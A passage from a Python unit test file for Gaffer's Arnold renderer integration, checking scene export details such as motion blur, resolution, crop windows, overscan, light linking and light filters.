hidden["fileName"].setValue( self.temporaryDirectory() + "/hidden.tif" )
visible = GafferImage.ImageReader()
visible["fileName"].setValue( self.temporaryDirectory() + "/visible.tif" )
hiddenStats = GafferImage.ImageStats()
hiddenStats["in"].setInput( hidden["out"] )
hiddenStats["area"].setValue( hiddenStats["in"]["dataWindow"].getValue() )
visibleStats = GafferImage.ImageStats()
visibleStats["in"].setInput( visible["out"] )
visibleStats["area"].setValue( visibleStats["in"]["dataWindow"].getValue() )
self.assertLess( hiddenStats["average"].getValue()[0], 0.05 )
self.assertGreater( visibleStats["average"].getValue()[0], .27 )
@staticmethod
def __m44f( m ) :
return imath.M44f( *[ i for row in m.data for i in row ] )
def testTransformMotion( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["sphere"] = GafferScene.Sphere()
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["plane"]["out"] )
s["group"]["in"][1].setInput( s["sphere"]["out"] )
s["expression"] = Gaffer.Expression()
s["expression"].setExpression(
inspect.cleandoc(
"""
parent["plane"]["transform"]["translate"]["x"] = context.getFrame()
parent["sphere"]["transform"]["translate"]["y"] = context.getFrame() * 2
parent["group"]["transform"]["translate"]["z"] = context.getFrame() - 1
"""
)
)
s["planeFilter"] = GafferScene.PathFilter()
s["planeFilter"]["paths"].setValue( IECore.StringVectorData( [ "/group/plane" ] ) )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["group"]["out"] )
s["attributes"]["filter"].setInput( s["planeFilter"]["out"] )
s["attributes"]["attributes"]["transformBlur"]["enabled"].setValue( True )
s["attributes"]["attributes"]["transformBlur"]["value"].setValue( False )
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["attributes"]["out"] )
s["options"]["options"]["shutter"]["enabled"].setValue( True )
s["options"]["options"]["transformBlur"]["enabled"].setValue( True )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# No motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrix = arnold.AiNodeGetMatrix( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrix = arnold.AiNodeGetMatrix( plane, "matrix" )
# Motion parameters should be left at default
self.assertEqual( sphereMotionStart, 0 )
self.assertEqual( sphereMotionEnd, 1 )
self.assertEqual( planeMotionStart, 0 )
self.assertEqual( planeMotionEnd, 1 )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, 2, 0 ) )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, 0 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 1 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur
s["options"]["options"]["transformBlur"]["value"].setValue( True )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), True )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -48 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 95 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
if [ int( v ) for v in arnold.AiGetVersion()[:3] ] >= [ 7, 0, 0 ] :
with Gaffer.Context() as c :
for i in range( 0, 2 ) :
c.setFrame( i )
self.assertTrue( os.path.exists( c.substitute( render["fileName"].getValue() ) ) )
else :
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions( universe ), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( universe, "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.SceneAlgo.registerRenderAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( universe, "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightAndShadowLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
arnoldAttributes = GafferArnold.ArnoldAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
arnoldAttributes["in"].setInput( attributes["out"] )
group["in"][0].setInput( arnoldAttributes["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
group["in"][3].setInput( sphere2["out"] )
render["in"].setInput( group["out"] )
# Illumination
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light" )
# Shadows
arnoldAttributes["attributes"]["shadowGroup"]["enabled"].setValue( True )
arnoldAttributes["attributes"]["shadowGroup"]["value"].setValue( "/group/light1" )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
# check illumination
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( lights, 0 ) ),
"light:/group/light"
)
# check shadows
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( shadows, 0 ) ),
"light:/group/light1"
)
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
# check illumination
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 0 )
# check shadows
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere1, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 0 )
def testNoLinkedLightsOnLights( self ) :
sphere = GafferScene.Sphere()
meshLightShader = GafferArnold.ArnoldShader()
meshLightShader.loadShader( "flat" )
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( sphere["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
meshLight["parameters"]["color"].setInput( meshLightShader["out"] )
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
# Trigger light linking by unlinking a light
light2["defaultLight"].setValue( False )
group = GafferScene.Group()
group["in"][0].setInput( meshLight["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightFilters( self ) :
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["lightFilter"]["out"] )
s["attributes"]["attributes"]["filteredLights"]["enabled"].setValue( True )
s["attributes"]["attributes"]["filteredLights"]["value"].setValue( "defaultLights" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["light"]["out"] )
s["assignment"]["shader"].setInput( s["gobo"]["out"] )
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["attributes"]["out"] )
s["group"]["in"][1].setInput( s["assignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
light = arnold.AiNodeLookUpByName( universe, "light:/group/light" )
linkedFilters = arnold.AiNodeGetArray( light, "filters" )
numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )
self.assertEqual( numFilters, 2 )
linkedFilter = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 0), arnold.POINTER(arnold.AtNode))
linkedGobo = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 1), arnold.POINTER(arnold.AtNode))
self.assertEqual( arnold.AiNodeGetName( linkedFilter ), "lightFilter:/group/lightFilter" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedFilter ) ), "light_blocker" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedGobo ) ), "gobo" )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testLightFiltersMany( self ) :
numLights = 10000
numLightFilters = 10000
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["lightFilter"]["filteredLights"].setValue( "defaultLights" )
s["planeFilters"] = GafferScene.Plane( "Plane" )
s["planeFilters"]["divisions"].setValue( imath.V2i( 1, numLightFilters / 2 - 1 ) )
s["instancerFilters"] = GafferScene.Instancer( "Instancer" )
s["instancerFilters"]["in"].setInput( s["planeFilters"]["out"] )
s["instancerFilters"]["instances"].setInput( s["lightFilter"]["out"] )
s["instancerFilters"]["parent"].setValue( "/plane" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["planeLights"] = GafferScene.Plane( "Plane" )
s["planeLights"]["divisions"].setValue( imath.V2i( 1, numLights / 2 - 1 ) )
s["instancerLights"] = GafferScene.Instancer( "Instancer" )
s["instancerLights"]["in"].setInput( s["planeLights"]["out"] )
s["instancerLights"]["instances"].setInput( s["light"]["out"] )
s["instancerLights"]["parent"].setValue( "/plane" )
s["group"] = GafferScene.Group( "Group" )
s["group"]["in"][0].setInput( s["instancerFilters"]["out"] )
s["group"]["in"][1].setInput( s["instancerLights"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
with Gaffer.Context() as c :
c["scene:render:sceneTranslationOnly"] = IECore.BoolData( True )
s["render"]["task"].execute()
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "Render aborted", s["render"]["task"].execute )
def testOSLShaders( self ) :
purple = GafferOSL.OSLShader()
purple.loadShader( "Maths/MixColor" )
purple["parameters"]["a"].setValue( imath.Color3f( 0.5, 0, 1 ) )
green = GafferOSL.OSLShader()
green.loadShader( "Maths/MixColor" )
green["parameters"]["a"].setValue( imath.Color3f( 0, 1, 0 ) )
mix = GafferOSL.OSLShader()
mix.loadShader( "Maths/MixColor" )
# test component connections
mix["parameters"]["a"][2].setInput( purple["out"]["out"][2] )
# test color connections
